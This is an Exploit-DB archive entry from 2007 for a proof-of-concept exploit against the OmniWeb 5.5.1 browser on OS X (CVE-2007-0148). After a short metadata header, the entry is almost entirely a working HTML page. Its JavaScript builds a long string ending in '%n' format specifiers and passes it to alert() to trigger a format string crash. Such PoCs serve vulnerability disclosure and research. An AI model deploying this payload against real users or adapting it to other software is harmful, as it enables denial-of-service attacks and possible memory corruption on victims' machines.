OmniWeb 5.5.1 Javascript alert Remote Format String PoC

2007-01-07T00:00:00
ID EDB-ID:3098
Type exploitdb
Reporter MoAB
Modified 2007-01-07T00:00:00

Description

OmniWeb 5.5.1 Javascript alert() Remote Format String PoC. CVE-2007-0148. Dos exploit for osx platform

                                        
                                            <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
	"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
	<head>
		<title>MOAB-07-01-2007</title>
		<script>
			/* LMH */
			function boom() {
				var str = 'A';
				while (str.length <= 32) str+=str;
				str = str + '%n%n%n%n%n%n';
				alert(str);
			}
		</script>
	</head>
	<body>
		<input type="button" onclick="boom();" value="Test MOAB-07-01-2007" />
	</body>

</html>

# milw0rm.com [2007-01-07]